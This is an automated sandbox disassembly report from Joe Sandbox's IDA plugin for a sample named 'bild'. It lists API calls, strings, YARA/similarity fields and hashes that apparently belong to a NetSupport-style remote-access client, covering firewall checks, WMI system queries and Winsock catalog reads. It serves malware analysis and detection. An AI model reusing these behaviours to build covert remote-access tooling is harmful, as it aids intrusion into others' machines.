                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                      • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                      • API String ID: 2036220054-60805735
                                                                                      APIs
                                                                                      • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115E3A8
                                                                                      • GetLastError.KERNEL32 ref: 1115E3B5
                                                                                      • wsprintfA.USER32 ref: 1115E3C8
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                      • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115E40C
                                                                                      • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115E419
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                      • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                      • API String ID: 1734919802-1728070458
                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • std::exception::exception.LIBCMT ref: 1111013A
                                                                                      • __CxxThrowException@8.LIBCMT ref: 1111014F
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                      • InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                      • InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                      • EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                      • LeaveCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111024F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
• String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
• API String ID: 1976012330-1024648535
• Opcode ID: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
• Instruction ID: 7e481d80fa827a07ee7257280804c30d2ae959ce5d98406b053f8524d928f6e4
• Opcode Fuzzy Hash: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
• Instruction Fuzzy Hash: 6C41C2B5E00216AFDB11CFB98C84BAEFBF5FB48708F00453AE815DB244E675A944CB91
APIs
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,4012B9B4,00000000,?), ref: 1115BA67
• CoCreateInstance.OLE32(111C4FEC,00000000,00000017,111C4F1C,?), ref: 1115BA87
• wsprintfW.USER32 ref: 1115BAA7
• SysAllocString.OLEAUT32(?), ref: 1115BAB3
• wsprintfW.USER32 ref: 1115BB67
• SysFreeString.OLEAUT32(?), ref: 1115BC08
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
• String ID: SELECT * FROM %s$WQL$root\CIMV2
• API String ID: 3050498177-823534439
• Opcode ID: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
• Instruction ID: 667e066b75244b2782fe63ff2368f72f8a2c2363a2cb4bcdb988270c73b3585f
• Opcode Fuzzy Hash: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
• Instruction Fuzzy Hash: 7351B071B00219ABC764CF69CC84F9AF7B9FB8A714F1042A8E429E7240DA70AE40CF55
APIs
  • Part of subcall function 11145330: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
  • Part of subcall function 11145330: RegCloseKey.ADVAPI32(?), ref: 11145404
• _memset.LIBCMT ref: 11145485
• GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
• LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
• GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
• FreeLibrary.KERNEL32(00000000), ref: 111454EF
• GetSystemDefaultLangID.KERNEL32 ref: 111454FA
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
• String ID: GetUserDefaultUILanguage$kernel32.dll
• API String ID: 4251163631-545709139
• Opcode ID: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
• Instruction ID: 76ed8f4553af2ae4cc76032582d3c5cf4b75be54885724a55a46303ac3459834
• Opcode Fuzzy Hash: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
• Instruction Fuzzy Hash: 07313971E002299BD761DF74D984BE9F7B6EB08729F540164E42DC7A80D7344984CF91
APIs
• wsprintfA.USER32 ref: 110150CA
• _memset.LIBCMT ref: 1101510E
• RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015148
Strings
• PackedCatalogItem, xrefs: 11015132
• %012d, xrefs: 110150C4
• NSLSP, xrefs: 11015158
• SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101504B
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: QueryValue_memsetwsprintf
• String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
• API String ID: 1333399081-1346142259
• Opcode ID: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
• Instruction ID: d38f3a4d66d5a90606c53f5b1b84405609ec5bb3b13ff7cea0d7775b25b40b12
• Opcode Fuzzy Hash: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
• Instruction Fuzzy Hash: C6419D71D02269AFEB11DB64CC90BDEF7B8EB44314F0445E9E819A7281EB35AB48CF50
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 1100FDED
• std::_Lockit::_Lockit.LIBCPMT ref: 1100FE10
• std::bad_exception::bad_exception.LIBCMT ref: 1100FE94
• __CxxThrowException@8.LIBCMT ref: 1100FEA2
• std::_Lockit::_Lockit.LIBCPMT ref: 1100FEB5
• std::locale::facet::_Facet_Register.LIBCPMT ref: 1100FECF
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
• String ID: bad cast
• API String ID: 2427920155-3145022300
• Opcode ID: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
• Instruction ID: 563b417412927bd42dfe2d2268ce551a617b01fe8fe711e168dc892134580a96
• Opcode Fuzzy Hash: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
• Instruction Fuzzy Hash: 5731E975D002669FD711DF94C890BAEF7B8EB04B68F10426DD921A7291DB717D40CB92
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
• SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
• SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
• String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
• API String ID: 3494822531-1878648853
• Opcode ID: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
• Instruction ID: dd955378f98185685044f21f066d1e50e049b7277ab8e5714ac6db0ba135c9a8
• Opcode Fuzzy Hash: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
• Instruction Fuzzy Hash: AB518835D4022E5BD711CF24DC50BDEF7A4AF15B08F2401A4D8997BA80EBB27B84CBA5
APIs
  • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
• LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                      • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                      • std::exception::exception.LIBCMT ref: 11107414
                                                                                      • __CxxThrowException@8.LIBCMT ref: 11107429
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$CreateEventException@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                      • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                      • API String ID: 2851125068-2390547818
                                                                                      • Opcode ID: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                      • Instruction ID: 20da51148d2406ef940ba90f631bbe284ff6dbb95dc7cb8c25b5cdc78ae8e1aa
                                                                                      • Opcode Fuzzy Hash: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                      • Instruction Fuzzy Hash: 2A4115B4D09B449FC761CF6A8940BDAFBE8EFA9604F00490EE5AE93210D7797500CF56
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 1101733C
                                                                                      • CoInitialize.OLE32(00000000), ref: 11017345
                                                                                      • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                      • CoUninitialize.COMBASE ref: 110173D0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                      • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                      • API String ID: 2407233060-578995875
                                                                                      • Opcode ID: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                      • Instruction ID: df925c951649f52390f194a40c23bf9fa59b5f59fb7a44760539d7ccd5920114
                                                                                      • Opcode Fuzzy Hash: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                      • Instruction Fuzzy Hash: 7F2137B5E041259BDB11DFA0CC46BBAB6E8AF40308F0040B9EC69DB184FA79E940D7A1
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 11017252
                                                                                      • CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                      • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                      • CoUninitialize.COMBASE ref: 110172E0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                      • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                      • API String ID: 2407233060-2037925671
                                                                                      • Opcode ID: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                      • Instruction ID: c2f3c346b695d23426c96ecc328f7bdb1aeadc280033f44fb53199f8ba8604cb
                                                                                      • Opcode Fuzzy Hash: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                      • Instruction Fuzzy Hash: 19210575E016299BD712DFE0CC45BEEB7E89F80718F0001A8FC29DB184EA7AE945C761
                                                                                      APIs
                                                                                      Strings
                                                                                      • Client, xrefs: 11138705
                                                                                      • DoICFConfig() OK, xrefs: 11138786
                                                                                      • AutoICFConfig, xrefs: 11138700
                                                                                      • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 1113879C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountTick
                                                                                      • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                      • API String ID: 536389180-1512301160
                                                                                      • Opcode ID: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                      • Instruction ID: a0019f70d98f4d819e239f855ef0bc8db2e19db1671bc02c3e0d3b7677daedde
                                                                                      • Opcode Fuzzy Hash: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                      • Instruction Fuzzy Hash: E4210578A247AB4AFB039B759ED4755FB83578073EF450278DE10862CCDB74A458CB42
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 11096984
                                                                                      • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                      • CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                      • CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                      • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                      • API String ID: 3222248624-258972079
                                                                                      • Opcode ID: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                      • Instruction ID: ffe5b7852bae71a5603cb4f529131e3535c43cf5cc9a129c5e7f13935f1cb029
                                                                                      • Opcode Fuzzy Hash: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                      • Instruction Fuzzy Hash: 9C11AC74E0012DABC700EAE5DC95AEFBB68AF45709F100029F50AEB144EA21EA40C7E2
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11025D16
                                                                                      • K32GetProcessImageFileNameA.KERNEL32(?,?,?,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D32
                                                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025D46
                                                                                      • SetLastError.KERNEL32(00000078,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D69
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                      • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                      • API String ID: 4186647306-532032230
                                                                                      • Opcode ID: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
                                                                                      • Instruction ID: 74662284ed99b9a54ad109221a671fe8fcdc3fa540ca7c31caa090441a4958f5
                                                                                      • Opcode Fuzzy Hash: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
                                                                                      • Instruction Fuzzy Hash: 98016D72601718ABE330DEA5EC48F87B7E8EB88765F10052AF95697200D631E8018BA4
                                                                                      APIs
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                      • CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
